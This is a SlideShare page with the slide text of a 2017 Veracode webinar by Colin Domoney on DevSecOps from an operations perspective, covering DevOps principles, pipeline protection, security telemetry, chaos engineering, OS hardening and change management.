SlideShare a Scribd company logo

How to get the best out of DevSecOps - an operations perspective

Download as PPTX, PDF
C
Colin Domoney

How to get the best out of DevSecOps - an operations perspective

Software
1 of 42
© 2017 VERACODE INC. 1© 2017 VERACODE INC. How to Get the Best Out Of DevSecOps The Operations Perspective
© 2017 VERACODE INC. 2© 2017 VERACODE INC. Introduction
© 2017 VERACODE INC. 3 About This Webinar https://www.brighttalk.com/webcast/12807/252395 Colin Domoney Senior Product Innovation Manager @colindomoney
© 2017 VERACODE INC. 4 Further Reading Kim, Gene, Kevin Behr, and George Spafford. 2013. The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win. Kim, Gene, Patrick Debois, and John Willis. 2016. The Devops Handbook: How to Create World-Class Agility, Reliability, and Security in Technology Organizations Beyer, Betsy, Jennifer Petoff, Chris Jones, and Niall Richard Murphy. Site Reliability Engineering: How Google Runs Production Systems. 1 edition. O′Reilly, 2016. Humble, Jez, and David Farley. 2010. Continuous Delivery: Reliable Software Releases Through Build, Test, and Deployment Automation. ‘2016 State of DevOps Report’. 2017. Puppet. Accessed January 23. https://puppet.com/resources/white- paper/2016-state-of-devops-report.
© 2017 VERACODE INC. 6© 2017 VERACODE INC. What is Dev(Sec)Ops
© 2017 VERACODE INC. 7 A Cultural Clash
© 2017 VERACODE INC. 8 What is Dev(Sec) Ops? “DevOps is the practice of operations and development engineers participating together in the entire service lifecycle, from design through the development process to production support.” “DevOps is also characterized by operations staff making use many of the same techniques as developers for their systems work.” Source : ‘What Is DevOps?’ 2010. The Agile Admin. August 2. https://theagileadmin.com/what-is-devops/.
© 2017 VERACODE INC. 9 The First Way : Systems Thinking Source : Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways- principles-underpinning-devops/. • Never pass a known defect to downstream work centre • Never allow local optimization to create global degradation • Always seek to increase flow • Always seek to achieve profound understanding of the system (per Deming) The First Way emphasizes the performance of the entire system, as opposed to the performance of a specific silo of work or department
© 2017 VERACODE INC. 10 The Second Way : Amplify Feedback Loops Source : Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways- principles-underpinning-devops/. The Second Way is about creating the right to left feedback loops. • Understand and respond to all customers, internal and external • Shorten and amplify all feedback loops • Embed knowledge where you need it
© 2017 VERACODE INC. 11 The Third Way : Continual Experimentation and Learning Source : Kim, Gene. 2012. ‘The Three Ways: The Principles Underpinning DevOps’. IT Revolution. August 22. http://itrevolution.com/the-three-ways- principles-underpinning-devops/. • Allocate time for the improvement of daily work • Create rituals that reward the team for taking risks • Introduce faults into the system to increase resilience The Third Way is about creating a culture that fosters two things: continual experimentation, taking risks and learning from failure; and understanding that repetition and practice is the prerequisite to mastery.
© 2017 VERACODE INC. 12 The Benefits of DevOps • High-performing organizations are decisively outperforming their lower-performing peers in terms of throughput. • High performers have better employee loyalty, as measured by employee Net Promoter Score (eNPS). • Improving quality is everyone’s job. • High performers spend 50 percent less time remediating security issues than low performers. • Taking an experimental approach to product development can improve your IT and organizational performance. • Undertaking a technology transformation initiative can produce sizeable cost savings for any organization. Source : ‘2016 State of DevOps Report’. 2017. Puppet. Accessed January 23. https://puppet.com/resources/white-paper/2016-state-of-devops-report.
© 2017 VERACODE INC. 13 DevOps Maturity Model Initial • Poor, ad hoc communication • No automation • Unpredictable, uncontrolled reactive process Managed • Managed communication, some shared decision making • Siloed automation, no central infrastructure • Processes are managed but not standardised Defined • Collaboration, shared decision making and accountability • Central automated processes across the application lifecycle • Processes are standardised across the organisation Measured • Collaboration-based processes are measured to identify inefficiencies and bottlenecks • Collect and analyse metrics of the automated processes and measure against the business goals • Visibility and predictability of entire process quality and performance Optimised • Effective knowledge sharing and individual empowerment • Self-service automation, self-learning using analytics and self-remediation • Process risk and cost optimisation
© 2017 VERACODE INC. 14© 2017 VERACODE INC. The Move to DevOps Market trends and enabling technologies
© 2017 VERACODE INC. 15 Before We Had DevOps
© 2017 VERACODE INC. 16 Cloud Technology and CI/CD Platforms Cloud Technology CI/CD Platforms
© 2017 VERACODE INC. 17 Configuration Management Tools
© 2017 VERACODE INC. 18 What Makes a Good DevSecOps Solution? •Provide security feedback as early as possible, in DevOps tools Fail quickly, through automation •Ease of use, actionable findings, speed, low FPs Limit time-to-market impact •Provide privacy early in SDLC, measure and assess teams, compliance and risk later Support team autonomy with enterprise orchestration •Microservices, Infrastructure as Code, leading edge languages and frameworks, Containerization Adapt to latest practices & technologies •Developer communities, small, consumable courses, open documentation, integrations in marketplaces Support culture of learning & openness •Provide feedback from Ops (Prod & QA) about risks/attacks in a way that is consumable by development Provide operational visibility
© 2017 VERACODE INC. 19© 2017 VERACODE INC. The Impact to Operations
© 2017 VERACODE INC. 20 Three Cornerstones • Collaboration – Very little crossover between teams, specific roles and responsibilities – Collaborate flexibly through flexible tools (i.e.. Slack) • Flexibility – Previously focused on stability over everything else – Modern organisations need to be flexible and responsive • Automation – Manual changes cannot keep pace with rapid turnaround times required – Frees up resources for critical thinking tasks and problem solving
© 2017 VERACODE INC. 21 “Infrastructure as Code” https://puppet.com/blog/what-is-infrastructure-as-code
© 2017 VERACODE INC. 22 Site Reliability Engineering - It’s all Software Now • Defined by Ben Treynor: "what happens when a software engineer is tasked with what used to be called operations. • The ideal SRE candidate is a coder who also has operational and systems knowledge and likes to whittle down complex tasks. • Typically spend their time as follows: – up to 50% of their time doing "ops" related work – up to 50% of their time on development tasks such as new features, scaling or automation https://en.wikipedia.org/wiki/Site_reliability_engineering
© 2017 VERACODE INC. 23© 2017 VERACODE INC. Best Practices for Securing Operations
© 2017 VERACODE INC. 24 Control Your Source Code Repositories • Continuous Deployment means any code checked in can potentially reach production within minutes • Best practices include: – Splitting repositories – Using Perforce for fine grained control – Performing peer reviews on ‘pull requests’ to critical code
© 2017 VERACODE INC. 25 Protect Your Deployment Pipeline • Continuous Deployment means that your pipeline is a critical piece of infrastructure • Best practices include: – Hardening CI/CD systems to prevent compromise – Review changes to prevent execution of unwanted code – Test for suspicious API calls in unit tests or scripts – Ensure CI/CD runs in isolated containers – Ensure VCS credentials are ‘read only’
© 2017 VERACODE INC. 26 Using Security Testing Tools Behavioural Driven Development Security Testing IDE Integrations for Security Testing
© 2017 VERACODE INC. 27 Integrate Security Into Your Deployment Pipeline – VSTS/TFS
© 2017 VERACODE INC. 28 Integrate Security Into Your Deployment Pipeline - Jenkins
© 2017 VERACODE INC. 29 Security Telemetry in Applications • Record all security relevant events such as: – Successful and unsuccessful logins – User password resets – User e-mail address resets – User credit card changes • Monitor changes in ratios of success to failures • Alert on events such as: – Anomalous behaviour – Sudden changes in values
© 2017 VERACODE INC. 30 Security Telemetry in the Environment • Monitor environmental items and events such as: – OS changes – Security group changes – Changes to configurations – Cloud infrastructure changes – Web server errors
© 2017 VERACODE INC. 31 Use the Right Tool for Job https://www.slideshare.net/YuryChemerkin/zane-lackey-security-at-scale-web-application-security-in-a- continuous-deployment-environment
© 2017 VERACODE INC. 32 Use the Right Tool for Job https://www.slideshare.net/YuryChemerkin/zane-lackey-security-at-scale-web-application-security-in-a- continuous-deployment-environment
© 2017 VERACODE INC. 33 Case Study : Security Telemetry at Etsy • Nick Galbreath (Director of Engineering at Etsy, 2010): – No dedicated fraud control or Infosec team – Embedded telemetry with entire DevOps value stream – Everyone was responsible for monitoring and alerting • Example events: – Abnormal program termination (segfaults) – Database syntax error – Indications of SQL attack
© 2017 VERACODE INC. 34 Automated Dashboards – “Measure All The Things”
© 2017 VERACODE INC. 35 “Security Is Not A Binary Event” https://www.slideshare.net/nickgsuperstar/devopssec-apply-devops- principles-to-security
© 2017 VERACODE INC. 36 Logging for Security • Logs are the ‘bread and butter’ of an IT Operations team • Challenges when used in a security context: – Delayed response to identity issues (delays in alerting) – Limited data (no POST body, no header data) – Limited context (disparate events in several locations) Phillip Maddux, https://medium.com/@foospidy
© 2017 VERACODE INC. 37 Destructive Testing / Chaos Engineering Chaos Engineering is the discipline of experimenting on a distributed system in order to build confidence in the system’s capability to withstand turbulent conditions in production. Four steps as follows: • Build a hypothesis around steady-state behaviour. • Vary real-world events. • Run experiments in production. • Automate experiments to run continuously. “The best way to avoid failure is to fail constantly.” - Jeff Atwood
© 2017 VERACODE INC. 38 Case Study : Netflix
© 2017 VERACODE INC. 40 Operating System Hardening • Disable unused and/or guest accounts • Run at level of least privilege • Disable unused services • Ensure automatic updates are enabled • Ensure strong passwords are used • Disable overly verbose logging • Ensure backups are performed
© 2017 VERACODE INC. 41 Runtime Application Self Protection • Very low false positives and false negatives. • Requires no modification to application source code. • Can report attack information into SIEM. • Can be deployed onto legacy applications and platforms. • Can execute in ‘monitor’ or ‘alert’ mode to identify attacks without protecting the application (IAST) Benefits of RASP • An ‘agent’ that executes in parallel with an application and provides run-time protection by monitoring traffic through the application. • Data propagation through the application to determine whether input data is ‘tainted’ in its lifetime. • If data is tainted then it is possible that the application is under attack and the agent can then protect the application at run-time. What is RASP?
© 2017 VERACODE INC. 42 Change Management Process • ITIL change management process defines three types of change: – Standard (low-risk, follow standard process, can be automated) – Normal (require approval by CAB, manual process) – Emergency (high priority CAB) • Too many changes are classified as ‘normal’ • DevOps best practice suggests: – Try and make as much as possible ‘standard’ and auto-approve – Optimise the CAB process for requests that remain as ‘normal’
© 2017 VERACODE INC. 43 Make a Commitment • Learn how to code! • Learn the ‘tools of the trade’ (Git, Ansible, etc.) • Learn the basics with a test application i.e. WebGoat.Net • Learn how a Version Control System works • Automate a repetitive task • Experience a ‘Day in the Life’ of a Developer Security is Everyone’s Responsibility
© 2017 VERACODE INC. 45 Thank You! © 2017 VERACODE INC.

Recommended

DevSecOps at Agile 2019
DevSecOps at Agile 2019 DevSecOps at Agile 2019
DevSecOps at Agile 2019 Elizabeth Ayer
 
Maturing DevSecOps: From Easy to High Impact
Maturing DevSecOps: From Easy to High ImpactMaturing DevSecOps: From Easy to High Impact
Maturing DevSecOps: From Easy to High ImpactSBWebinars
 
The New Security Playbook: DevSecOps
The New Security Playbook: DevSecOpsThe New Security Playbook: DevSecOps
The New Security Playbook: DevSecOpsJames Wickett
 
2019 DevSecOps Reference Architectures
2019 DevSecOps Reference Architectures2019 DevSecOps Reference Architectures
2019 DevSecOps Reference ArchitecturesSonatype
 
DevSecOps and the CI/CD Pipeline
DevSecOps and the CI/CD Pipeline DevSecOps and the CI/CD Pipeline
DevSecOps and the CI/CD PipelineJames Wickett
 
DevSecOps: Bringing security to the DevOps pipeline
DevSecOps: Bringing security to the DevOps pipelineDevSecOps: Bringing security to the DevOps pipeline
DevSecOps: Bringing security to the DevOps pipelineAarno Aukia
 
DevOps or DevSecOps
DevOps or DevSecOpsDevOps or DevSecOps
DevOps or DevSecOpsMichelangelo van Dam
 
DevSecOps 101
DevSecOps 101DevSecOps 101
DevSecOps 101Narudom Roongsiriwong, CISSP
 

Recommended

DevSecOps at Agile 2019
DevSecOps at Agile 2019 DevSecOps at Agile 2019
DevSecOps at Agile 2019 Elizabeth Ayer
 
Maturing DevSecOps: From Easy to High Impact
Maturing DevSecOps: From Easy to High ImpactMaturing DevSecOps: From Easy to High Impact
Maturing DevSecOps: From Easy to High ImpactSBWebinars
 
The New Security Playbook: DevSecOps
The New Security Playbook: DevSecOpsThe New Security Playbook: DevSecOps
The New Security Playbook: DevSecOpsJames Wickett
 
2019 DevSecOps Reference Architectures
2019 DevSecOps Reference Architectures2019 DevSecOps Reference Architectures
2019 DevSecOps Reference ArchitecturesSonatype
 
DevSecOps and the CI/CD Pipeline
DevSecOps and the CI/CD Pipeline DevSecOps and the CI/CD Pipeline
DevSecOps and the CI/CD PipelineJames Wickett
 
DevSecOps: Bringing security to the DevOps pipeline
DevSecOps: Bringing security to the DevOps pipelineDevSecOps: Bringing security to the DevOps pipeline
DevSecOps: Bringing security to the DevOps pipelineAarno Aukia
 
DevOps or DevSecOps
DevOps or DevSecOpsDevOps or DevSecOps
DevOps or DevSecOpsMichelangelo van Dam
 
DevSecOps 101
DevSecOps 101DevSecOps 101
DevSecOps 101Narudom Roongsiriwong, CISSP
 
Building a DevSecOps Pipeline Around Your Spring Boot Application
Building a DevSecOps Pipeline Around Your Spring Boot ApplicationBuilding a DevSecOps Pipeline Around Your Spring Boot Application
Building a DevSecOps Pipeline Around Your Spring Boot ApplicationVMware Tanzu
 
DevSecOps: A New Hope for Security in CI/CD
DevSecOps: A New Hope for Security in CI/CDDevSecOps: A New Hope for Security in CI/CD
DevSecOps: A New Hope for Security in CI/CDFranklin Mosley
 
DevSecOps: essential tooling to enable continuous security 2019-09-16
DevSecOps: essential tooling to enable continuous security 2019-09-16DevSecOps: essential tooling to enable continuous security 2019-09-16
DevSecOps: essential tooling to enable continuous security 2019-09-16Rich Mills
 
Adversary Driven Defense in the Real World
Adversary Driven Defense in the Real WorldAdversary Driven Defense in the Real World
Adversary Driven Defense in the Real WorldJames Wickett
 
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Erkang Zheng
 
DevSecOps Singapore 2017 - Security in the Delivery Pipeline
DevSecOps Singapore 2017 - Security in the Delivery PipelineDevSecOps Singapore 2017 - Security in the Delivery Pipeline
DevSecOps Singapore 2017 - Security in the Delivery PipelineJames Wickett
 
Devops Indonesia - DevSecOps - The Open Source Way
Devops Indonesia - DevSecOps - The Open Source WayDevops Indonesia - DevSecOps - The Open Source Way
Devops Indonesia - DevSecOps - The Open Source WayYusuf Hadiwinata Sutandar
 
Dos and Don'ts of DevSecOps
Dos and Don'ts of DevSecOpsDos and Don'ts of DevSecOps
Dos and Don'ts of DevSecOpsPriyanka Aash
 
Pentest is yesterday, DevSecOps is tomorrow
Pentest is yesterday, DevSecOps is tomorrowPentest is yesterday, DevSecOps is tomorrow
Pentest is yesterday, DevSecOps is tomorrowAmien Harisen Rosyandino
 
DevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOpslokori
 
The State of DevSecOps
The State of DevSecOpsThe State of DevSecOps
The State of DevSecOpsDevOps Indonesia
 
ABN AMRO DevSecOps Journey
ABN AMRO DevSecOps JourneyABN AMRO DevSecOps Journey
ABN AMRO DevSecOps JourneyDerek E. Weeks
 
DevSecOps What Why and How
DevSecOps What Why and HowDevSecOps What Why and How
DevSecOps What Why and HowNotSoSecure Global Services
 
Benefits of DevSecOps
Benefits of DevSecOpsBenefits of DevSecOps
Benefits of DevSecOpsFinto Thomas , CISSP, TOGAF, CCSP, ITIL. JNCIS
 
The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019James Wickett
 
Zero to Ninety in Securing DevOps
Zero to Ninety in Securing DevOpsZero to Ninety in Securing DevOps
Zero to Ninety in Securing DevOpsDevSecOps Days
 
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...SecureSoftwareDevOn SecureSoftwareDevOn
 
DevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim MackeyDevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim MackeyDevSecCon
 
RSAC DevSecOpsDays 2018 - We are all Equifax
RSAC DevSecOpsDays 2018 - We are all EquifaxRSAC DevSecOpsDays 2018 - We are all Equifax
RSAC DevSecOpsDays 2018 - We are all EquifaxSonatype
 
How to get the best out of DevSecOps - a security perspective
How to get the best out of DevSecOps - a security perspectiveHow to get the best out of DevSecOps - a security perspective
How to get the best out of DevSecOps - a security perspectiveColin Domoney
 
How to apply DevOps in a regulated organisation
How to apply DevOps in a regulated organisationHow to apply DevOps in a regulated organisation
How to apply DevOps in a regulated organisationColin Domoney
 

More Related Content

What's hot

Building a DevSecOps Pipeline Around Your Spring Boot Application
Building a DevSecOps Pipeline Around Your Spring Boot ApplicationBuilding a DevSecOps Pipeline Around Your Spring Boot Application
Building a DevSecOps Pipeline Around Your Spring Boot ApplicationVMware Tanzu
 
DevSecOps: A New Hope for Security in CI/CD
DevSecOps: A New Hope for Security in CI/CDDevSecOps: A New Hope for Security in CI/CD
DevSecOps: A New Hope for Security in CI/CDFranklin Mosley
 
DevSecOps: essential tooling to enable continuous security 2019-09-16
DevSecOps: essential tooling to enable continuous security 2019-09-16DevSecOps: essential tooling to enable continuous security 2019-09-16
DevSecOps: essential tooling to enable continuous security 2019-09-16Rich Mills
 
Adversary Driven Defense in the Real World
Adversary Driven Defense in the Real WorldAdversary Driven Defense in the Real World
Adversary Driven Defense in the Real WorldJames Wickett
 
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Erkang Zheng
 
DevSecOps Singapore 2017 - Security in the Delivery Pipeline
DevSecOps Singapore 2017 - Security in the Delivery PipelineDevSecOps Singapore 2017 - Security in the Delivery Pipeline
DevSecOps Singapore 2017 - Security in the Delivery PipelineJames Wickett
 
Devops Indonesia - DevSecOps - The Open Source Way
Devops Indonesia - DevSecOps - The Open Source WayDevops Indonesia - DevSecOps - The Open Source Way
Devops Indonesia - DevSecOps - The Open Source WayYusuf Hadiwinata Sutandar
 
Dos and Don'ts of DevSecOps
Dos and Don'ts of DevSecOpsDos and Don'ts of DevSecOps
Dos and Don'ts of DevSecOpsPriyanka Aash
 
Pentest is yesterday, DevSecOps is tomorrow
Pentest is yesterday, DevSecOps is tomorrowPentest is yesterday, DevSecOps is tomorrow
Pentest is yesterday, DevSecOps is tomorrowAmien Harisen Rosyandino
 
DevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOpslokori
 
ABN AMRO DevSecOps Journey
ABN AMRO DevSecOps JourneyABN AMRO DevSecOps Journey
ABN AMRO DevSecOps JourneyDerek E. Weeks
 
The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019James Wickett
 
Zero to Ninety in Securing DevOps
Zero to Ninety in Securing DevOpsZero to Ninety in Securing DevOps
Zero to Ninety in Securing DevOpsDevSecOps Days
 
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...SecureSoftwareDevOn SecureSoftwareDevOn
 
DevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim MackeyDevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim MackeyDevSecCon
 
RSAC DevSecOpsDays 2018 - We are all Equifax
RSAC DevSecOpsDays 2018 - We are all EquifaxRSAC DevSecOpsDays 2018 - We are all Equifax
RSAC DevSecOpsDays 2018 - We are all EquifaxSonatype
 

What's hot (20)

Building a DevSecOps Pipeline Around Your Spring Boot Application
Building a DevSecOps Pipeline Around Your Spring Boot ApplicationBuilding a DevSecOps Pipeline Around Your Spring Boot Application
Building a DevSecOps Pipeline Around Your Spring Boot Application
 
DevSecOps: A New Hope for Security in CI/CD
DevSecOps: A New Hope for Security in CI/CDDevSecOps: A New Hope for Security in CI/CD
DevSecOps: A New Hope for Security in CI/CD
 
DevSecOps: essential tooling to enable continuous security 2019-09-16
DevSecOps: essential tooling to enable continuous security 2019-09-16DevSecOps: essential tooling to enable continuous security 2019-09-16
DevSecOps: essential tooling to enable continuous security 2019-09-16
 
Adversary Driven Defense in the Real World
Adversary Driven Defense in the Real WorldAdversary Driven Defense in the Real World
Adversary Driven Defense in the Real World
 
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
Overcoming the old ways of working with DevSecOps - Culture, Data, Graph, and...
 
DevSecOps Singapore 2017 - Security in the Delivery Pipeline
DevSecOps Singapore 2017 - Security in the Delivery PipelineDevSecOps Singapore 2017 - Security in the Delivery Pipeline
DevSecOps Singapore 2017 - Security in the Delivery Pipeline
 
Devops Indonesia - DevSecOps - The Open Source Way
Devops Indonesia - DevSecOps - The Open Source WayDevops Indonesia - DevSecOps - The Open Source Way
Devops Indonesia - DevSecOps - The Open Source Way
 
Dos and Don'ts of DevSecOps
Dos and Don'ts of DevSecOpsDos and Don'ts of DevSecOps
Dos and Don'ts of DevSecOps
 
Pentest is yesterday, DevSecOps is tomorrow
Pentest is yesterday, DevSecOps is tomorrowPentest is yesterday, DevSecOps is tomorrow
Pentest is yesterday, DevSecOps is tomorrow
 
DevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOpsDevSecCon London 2018: Open DevSecOps
DevSecCon London 2018: Open DevSecOps
 
Hacker Games & DevSecOps
Hacker Games & DevSecOpsHacker Games & DevSecOps
Hacker Games & DevSecOps
 
The State of DevSecOps
The State of DevSecOpsThe State of DevSecOps
The State of DevSecOps
 
ABN AMRO DevSecOps Journey
ABN AMRO DevSecOps JourneyABN AMRO DevSecOps Journey
ABN AMRO DevSecOps Journey
 
DevSecOps What Why and How
DevSecOps What Why and HowDevSecOps What Why and How
DevSecOps What Why and How
 
Benefits of DevSecOps
Benefits of DevSecOpsBenefits of DevSecOps
Benefits of DevSecOps
 
The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019The New Ways of DevSecOps - The Secure Dev 2019
The New Ways of DevSecOps - The Secure Dev 2019
 
Zero to Ninety in Securing DevOps
Zero to Ninety in Securing DevOpsZero to Ninety in Securing DevOps
Zero to Ninety in Securing DevOps
 
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...
Introducing DevSecOps by Madhu Akula - Software Security Bangalore - May 27 2...
 
DevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim MackeyDevSecCon London 2017: when good containers go bad by Tim Mackey
DevSecCon London 2017: when good containers go bad by Tim Mackey
 
RSAC DevSecOpsDays 2018 - We are all Equifax
RSAC DevSecOpsDays 2018 - We are all EquifaxRSAC DevSecOpsDays 2018 - We are all Equifax
RSAC DevSecOpsDays 2018 - We are all Equifax
 

Similar to How to get the best out of DevSecOps - an operations perspective

How to get the best out of DevSecOps - a security perspective
How to get the best out of DevSecOps - a security perspectiveHow to get the best out of DevSecOps - a security perspective
How to get the best out of DevSecOps - a security perspectiveColin Domoney
 
How to apply DevOps in a regulated organisation
How to apply DevOps in a regulated organisationHow to apply DevOps in a regulated organisation
How to apply DevOps in a regulated organisationColin Domoney
 
DevOps: Security's Big Opportunity
DevOps: Security's Big OpportunityDevOps: Security's Big Opportunity
DevOps: Security's Big OpportunityTimothy Jarrett
 
How to get the best out of DevSecOps - a developers perspective
How to get the best out of DevSecOps - a developers perspectiveHow to get the best out of DevSecOps - a developers perspective
How to get the best out of DevSecOps - a developers perspectiveColin Domoney
 
Enterprise DevOps and the Modern Mainframe Webcast Presentation
Enterprise DevOps and the Modern Mainframe Webcast PresentationEnterprise DevOps and the Modern Mainframe Webcast Presentation
Enterprise DevOps and the Modern Mainframe Webcast PresentationCompuware
 
Embrace DevSecOps and Enjoy a Significant Competitive Advantage!
Embrace DevSecOps and Enjoy a Significant Competitive Advantage!Embrace DevSecOps and Enjoy a Significant Competitive Advantage!
Embrace DevSecOps and Enjoy a Significant Competitive Advantage!DevOps.com
 
Your Resolution for 2018: Five Principles For Securing DevOps
Your Resolution for 2018: Five Principles For Securing DevOpsYour Resolution for 2018: Five Principles For Securing DevOps
Your Resolution for 2018: Five Principles For Securing DevOpsDevOps.com
 
Scale Continuous Deployment to Production with DeployHub and CloudBees
Scale Continuous Deployment to Production with DeployHub and CloudBeesScale Continuous Deployment to Production with DeployHub and CloudBees
Scale Continuous Deployment to Production with DeployHub and CloudBeesDevOps.com
 
Scale Continuous Deployment to Production with DeployHub and CloudBees
Scale Continuous Deployment to Production with DeployHub and CloudBeesScale Continuous Deployment to Production with DeployHub and CloudBees
Scale Continuous Deployment to Production with DeployHub and CloudBeesDeborah Schalm
 
Industry Perspective: DevOps - What it Means for the Average Business
Industry Perspective: DevOps - What it Means for the Average BusinessIndustry Perspective: DevOps - What it Means for the Average Business
Industry Perspective: DevOps - What it Means for the Average BusinessMichael Elder
 
Introduction to DevOps slides-converted (1).pptx
Introduction to DevOps slides-converted (1).pptxIntroduction to DevOps slides-converted (1).pptx
Introduction to DevOps slides-converted (1).pptxaasssss1
 
DevOps: What, who, why and how?
DevOps: What, who, why and how?DevOps: What, who, why and how?
DevOps: What, who, why and how?Red Gate Software
 
DevOps culture, concepte , philosophie and practices
DevOps culture, concepte , philosophie and practicesDevOps culture, concepte , philosophie and practices
DevOps culture, concepte , philosophie and practicesayoubbahaddouayoub
 
Introduction to DevOps slides.pdf
Introduction to DevOps slides.pdfIntroduction to DevOps slides.pdf
Introduction to DevOps slides.pdfBoreVishnusai
 
IBM Innovate - Uderstanding DevOps
IBM Innovate - Uderstanding DevOpsIBM Innovate - Uderstanding DevOps
IBM Innovate - Uderstanding DevOpsSanjeev Sharma
 
DevOps for Enterprise Systems : Innovate like a Startup
DevOps for Enterprise Systems : Innovate like a StartupDevOps for Enterprise Systems : Innovate like a Startup
DevOps for Enterprise Systems : Innovate like a StartupDevOps for Enterprise Systems
 
Deliver on the Promise of Agile and DevOps Transformations
Deliver on the Promise of Agile and DevOps TransformationsDeliver on the Promise of Agile and DevOps Transformations
Deliver on the Promise of Agile and DevOps TransformationsTasktop
 
Back To Basics
Back To BasicsBack To Basics
Back To Basicskamalikamj
 

Similar to How to get the best out of DevSecOps - an operations perspective (20)

How to get the best out of DevSecOps - a security perspective
How to get the best out of DevSecOps - a security perspectiveHow to get the best out of DevSecOps - a security perspective
How to get the best out of DevSecOps - a security perspective
 
How to apply DevOps in a regulated organisation
How to apply DevOps in a regulated organisationHow to apply DevOps in a regulated organisation
How to apply DevOps in a regulated organisation
 
DevOps: Security's Big Opportunity
DevOps: Security's Big OpportunityDevOps: Security's Big Opportunity
DevOps: Security's Big Opportunity
 
How to get the best out of DevSecOps - a developers perspective
How to get the best out of DevSecOps - a developers perspectiveHow to get the best out of DevSecOps - a developers perspective
How to get the best out of DevSecOps - a developers perspective
 
Enterprise DevOps and the Modern Mainframe Webcast Presentation
Enterprise DevOps and the Modern Mainframe Webcast PresentationEnterprise DevOps and the Modern Mainframe Webcast Presentation
Enterprise DevOps and the Modern Mainframe Webcast Presentation
 
Embrace DevSecOps and Enjoy a Significant Competitive Advantage!
Embrace DevSecOps and Enjoy a Significant Competitive Advantage!Embrace DevSecOps and Enjoy a Significant Competitive Advantage!
Embrace DevSecOps and Enjoy a Significant Competitive Advantage!
 
Your Resolution for 2018: Five Principles For Securing DevOps
Your Resolution for 2018: Five Principles For Securing DevOpsYour Resolution for 2018: Five Principles For Securing DevOps
Your Resolution for 2018: Five Principles For Securing DevOps
 
Scale Continuous Deployment to Production with DeployHub and CloudBees
Scale Continuous Deployment to Production with DeployHub and CloudBeesScale Continuous Deployment to Production with DeployHub and CloudBees
Scale Continuous Deployment to Production with DeployHub and CloudBees
 
Scale Continuous Deployment to Production with DeployHub and CloudBees
Scale Continuous Deployment to Production with DeployHub and CloudBeesScale Continuous Deployment to Production with DeployHub and CloudBees
Scale Continuous Deployment to Production with DeployHub and CloudBees
 
DevOps introduction
DevOps introductionDevOps introduction
DevOps introduction
 
Industry Perspective: DevOps - What it Means for the Average Business
Industry Perspective: DevOps - What it Means for the Average BusinessIndustry Perspective: DevOps - What it Means for the Average Business
Industry Perspective: DevOps - What it Means for the Average Business
 
Introduction to DevOps slides-converted (1).pptx
Introduction to DevOps slides-converted (1).pptxIntroduction to DevOps slides-converted (1).pptx
Introduction to DevOps slides-converted (1).pptx
 
DevOps: What, who, why and how?
DevOps: What, who, why and how?DevOps: What, who, why and how?
DevOps: What, who, why and how?
 
DevOps culture, concepte , philosophie and practices
DevOps culture, concepte , philosophie and practicesDevOps culture, concepte , philosophie and practices
DevOps culture, concepte , philosophie and practices
 
Introduction to DevOps slides.pdf
Introduction to DevOps slides.pdfIntroduction to DevOps slides.pdf
Introduction to DevOps slides.pdf
 
IBM Innovate - Uderstanding DevOps
IBM Innovate - Uderstanding DevOpsIBM Innovate - Uderstanding DevOps
IBM Innovate - Uderstanding DevOps
 
DevOps for Enterprise Systems : Innovate like a Startup
DevOps for Enterprise Systems : Innovate like a StartupDevOps for Enterprise Systems : Innovate like a Startup
